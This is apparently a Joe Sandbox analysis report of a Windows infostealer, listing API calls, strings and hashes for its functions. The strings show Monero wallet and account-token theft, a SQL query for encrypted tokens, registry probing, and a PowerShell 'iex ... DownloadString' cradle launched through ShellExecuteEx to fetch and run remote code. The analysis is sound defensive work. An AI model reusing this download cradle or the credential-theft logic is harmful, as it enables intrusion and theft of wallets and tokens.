                          • Instruction ID: d151493793ad9709ab334dca937bede1bb1ded965656a3f3972f70a333d3f370
                          • Opcode Fuzzy Hash: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
                          • Instruction Fuzzy Hash: 8B4187B6D0020C6BDF15FBA0EC46FFE777DAB98304F004558B6199A181EA755B8C8BD2
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0038BC9F
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0038BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0038BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0038BDB9
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                          • Instruction ID: 67c0bd1e56b15e401caf2c0f9e538af44717d56aa04d88ec3af7af763cc8b6ea
                          • Opcode Fuzzy Hash: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                          • Instruction Fuzzy Hash: 83B141729106189BDF06FBA0DD96EEE7778BF54300F404258F506AA091EF346E49DBE2
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                          • Instruction ID: 79a8265c5936548aa9c5a27bd38ea24e9cc9f2bf2a862d9709ccbc26b039a99a
                          • Opcode Fuzzy Hash: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                          • Instruction Fuzzy Hash: 9FF05E3590520DEFD7449FE0ED1EB2C7FB4FB1470BF040199E60986290D6704B46AB96
                          APIs
                          • lstrcat.KERNEL32(?,00E3E470), ref: 003947DB
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00394801
                          • lstrcat.KERNEL32(?,?), ref: 00394820
                          • lstrcat.KERNEL32(?,?), ref: 00394834
                          • lstrcat.KERNEL32(?,00E2B5E0), ref: 00394847
                          • lstrcat.KERNEL32(?,?), ref: 0039485B
                          • lstrcat.KERNEL32(?,00E3D6E0), ref: 0039486F
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                            • Part of subcall function 00394570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                            • Part of subcall function 00394570: RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                            • Part of subcall function 00394570: wsprintfA.USER32 ref: 003945A6
                            • Part of subcall function 00394570: FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID: p
                          • API String ID: 2540262943-2678736219
                          • Opcode ID: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                          • Instruction ID: 8ab92cd689779097317d1f8185965364b3abbca654ce664b8130c6dff7d0d0ac
                          • Opcode Fuzzy Hash: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                          • Instruction Fuzzy Hash: F13184B290021C5BCF12F7B0DC85EE9777CAB58704F404589B315EA081EE749B8ECB95
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00384FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00384FD1
                          • InternetOpenA.WININET(003A0DDF,00000000,00000000,00000000,00000000), ref: 00384FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00385011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00385041
                          • InternetCloseHandle.WININET(?), ref: 003850B9
                          • InternetCloseHandle.WININET(?), ref: 003850C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 2c917e028d8865ad514425ac79393382a208bc0e1a6531e226e9d6235ca2e03e
                          • Instruction ID: ea220e00e2ccf6ac37472721f7dbcfe6e826e6c93e8f7c3b46c76359424170b0
                          • Opcode Fuzzy Hash: 2c917e028d8865ad514425ac79393382a208bc0e1a6531e226e9d6235ca2e03e
                          • Instruction Fuzzy Hash: A431F5F4A4021CABDB20DF54DC85BDCBBB4FB48708F1081D9EA09A7281C7706AC59F99
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                          • wsprintfA.USER32 ref: 00398459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00E3E350,00000000,000F003F,?,00000400), ref: 003984EC
                          • lstrlen.KERNEL32(?), ref: 00398501
                          • RegQueryValueExA.ADVAPI32(00000000,00E3E440,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003A0B34), ref: 00398599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00398608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0039861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                          • Instruction ID: 3e6b7ed1cc97d9c1da75357b18dfc09011897963d97e64a7b6ce016433c36981
                          • Opcode Fuzzy Hash: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                          • Instruction Fuzzy Hash: BB21E77191022CAFDB24DB54DC85FE9B7B8FB48704F00C598E649A6140DF71AA85CFE4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003976A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003976AB
                          • RegOpenKeyExA.ADVAPI32(80000002,00E2BE88,00000000,00020119,00000000), ref: 003976DD
                          • RegQueryValueExA.ADVAPI32(00000000,00E3E2D8,00000000,00000000,?,000000FF), ref: 003976FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00397708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                          • Instruction ID: d2e6878628788803fc740dcb17c03927ac5f5ad17e326620573cbb17d08cb6f6
                          • Opcode Fuzzy Hash: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                          • Instruction Fuzzy Hash: 31014FB5A04608BFEB00DBE4DC49F7ABBB8EB58705F104454FA04D7291E67099089B51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0039773B
                          • RegOpenKeyExA.ADVAPI32(80000002,00E2BE88,00000000,00020119,003976B9), ref: 0039775B
                          • RegQueryValueExA.ADVAPI32(003976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0039777A
                          • RegCloseKey.ADVAPI32(003976B9), ref: 00397784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                          • Instruction ID: a241734f3ffb934f4067e92453623950949a34bd48407d1420da31ee2bfcd2ff
                          • Opcode Fuzzy Hash: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                          • Instruction Fuzzy Hash: FE0112B5A4030CBFEB00DBE4DC4AFBEBBB8EB58705F104559FA05A7281DB705A049B91
                          APIs
                          • CreateFileA.KERNEL32(:9,80000000,00000003,00000000,00000003,00000080,00000000,?,00393AEE,?), ref: 003992FC
                          • GetFileSizeEx.KERNEL32(000000FF,:9), ref: 00399319
                          • CloseHandle.KERNEL32(000000FF), ref: 00399327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :9$:9
                          • API String ID: 1378416451-4108897303
                          • Opcode ID: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                          • Instruction ID: 452fd9cbc717bd64792a471d4d0a085ea2f1c856977c538733bc99e97081d0a1
                          • Opcode Fuzzy Hash: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                          • Instruction Fuzzy Hash: 06F03C79E40208FBDF10DFB4DC49F9E7BF9EB58710F118258B651A72C0E67096459B50
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                          • LocalFree.KERNEL32(0038148F), ref: 00389A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                          • Instruction ID: 00f62bc10d2f06762c1ce2811320b38808553349923b31f288be8432a9452333
                          • Opcode Fuzzy Hash: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                          • Instruction Fuzzy Hash: 803116B4A00309EFDB15DF94C885FAE7BB9FF48304F108199E911A7290D778AA45CFA1
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00392D85
                          Strings
                          • <, xrefs: 00392D39
                          • ')", xrefs: 00392CB3
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00392CC4
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00392D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                          • Instruction ID: 3d89e451b0134de5cba17644aebd4d6396d4cca1548951fe18068c7e3cbefaae
                          • Opcode Fuzzy Hash: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                          • Instruction Fuzzy Hash: D641BD71C106189ADF1AEBA0C892FEDBB78AF14300F404219E116AA191DF746A4ADFD6
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00389F41
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 9b1100f8d190aaa00c936366a8070ccf5076f4d4650daf8685ab6acdc93fab45
                          • Instruction ID: 4f8e1015c50e1f6caa2cbdd99b6d6820842cb242f98a49b5f021a04ff7be7f0d
                          • Opcode Fuzzy Hash: 9b1100f8d190aaa00c936366a8070ccf5076f4d4650daf8685ab6acdc93fab45
                          • Instruction Fuzzy Hash: 04612D71A10748DBDF25EFA4CC96BED7779AF45300F008118F90A5F591EB746A06CB92
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,00E2BFA0,00000000,00020119,?), ref: 00397E5E
                          • RegQueryValueExA.ADVAPI32(?,00E3D9C0,00000000,00000000,000000FF,000000FF), ref: 00397E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00397E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                          • Instruction ID: 78733bb401f4613260b543a5ff669a32013de9ad7076e20188d879113f4ef110
                          • Opcode Fuzzy Hash: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                          • Instruction Fuzzy Hash: DF118CB1A44609EFDB04CB95DD4AFBBBBBCFB04B04F104119F605A7280D77458049BA1
                          APIs
                          • StrStrA.SHLWAPI(00E3E188,?,?,?,0039140C,?,00E3E188,00000000), ref: 0039926C
                          • lstrcpyn.KERNEL32(005CAB88,00E3E188,00E3E188,?,0039140C,?,00E3E188), ref: 00399290
                          • lstrlen.KERNEL32(?,?,0039140C,?,00E3E188), ref: 003992A7
                          • wsprintfA.USER32 ref: 003992C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                          • Instruction ID: ad1e8d353323ad1ad146f47ad606d3f36ffbee88219628bbf869166dbc264012
                          • Opcode Fuzzy Hash: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                          • Instruction Fuzzy Hash: 86019E7550020CAFCB04DFE8C988EAE7BB9EB58358F148548F9099B204C635AA549B91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                          • RegCloseKey.ADVAPI32(?), ref: 003812FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                          • Instruction ID: 4ca217422f8899104f96c4f287e36d8c2bc56c00aba07c8c38476ef559920c89
                          • Opcode Fuzzy Hash: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                          • Instruction Fuzzy Hash: 24011DB9A4020CBFDB00DFE0DC49FAEBBB8EB48705F008159FA0597280D6709A059B91
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 3945fd466480ec7cb73e87d6843cc7fa155c3a1c6f45a6288a7e0f3a237c18ab
                          • Instruction ID: 6d640ad234e88d4f73e6e9de48596aa38aaec3c22f55d0abad989da78f72f567
                          • Opcode Fuzzy Hash: 3945fd466480ec7cb73e87d6843cc7fa155c3a1c6f45a6288a7e0f3a237c18ab
                          • Instruction Fuzzy Hash: F541F5B151079C5EDF238B248D95FFBBBECAB45704F1454E8E98A86182D3719A44CF60
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00396663
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00396726
                          • ExitProcess.KERNEL32 ref: 00396755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                          • Instruction ID: d910416e87135a02df21188dea274fd6c4520ac9f441bf93b399fba75cf1a555
                          • Opcode Fuzzy Hash: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                          • Instruction Fuzzy Hash: 98312CB1801618ABDF15EB90DC96FDEBB78AF54300F404189F2096A191DF746B49CFAA
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E28,00000000,?), ref: 0039882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00398836
                          • wsprintfA.USER32 ref: 00398850
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                          • Instruction ID: 6132db35c8259e01b110a38edf589d10516b125139312c7cb7f82438d3c5d01b
                          • Opcode Fuzzy Hash: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                          • Instruction Fuzzy Hash: 17214CB1E40608AFDB04DFD8DD49FAEBBB8FB48B05F104119F605A7280C779A904DBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0039951E,00000000), ref: 00398D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00398D62
                          • wsprintfW.USER32 ref: 00398D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                          • Instruction ID: d4ca25468d2c90a7e9750373d6ed5c2b3ea3f849062d1a79ee7a9a51fc39b50f
                          • Opcode Fuzzy Hash: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                          • Instruction Fuzzy Hash: A6E08CB0A4020CBFE700DB94DC0AE697BBCEB0470AF000094FD0997280DA719E04AB96
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0038A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0038A6BC
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0038A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                          • Instruction ID: e5e054d027b8cc5a4822bbbd9da4983cee8c4a5d289f3d8ee53e6547ddb46a4e
                          • Opcode Fuzzy Hash: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                          • Instruction Fuzzy Hash: 9BE1EF728205189BDF06FBA4DC92EEE7738BF14300F508259F5167A091EF306A4DDBA6
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D481
                          • lstrlen.KERNEL32(00000000), ref: 0038D698
                          • lstrlen.KERNEL32(00000000), ref: 0038D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0038D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
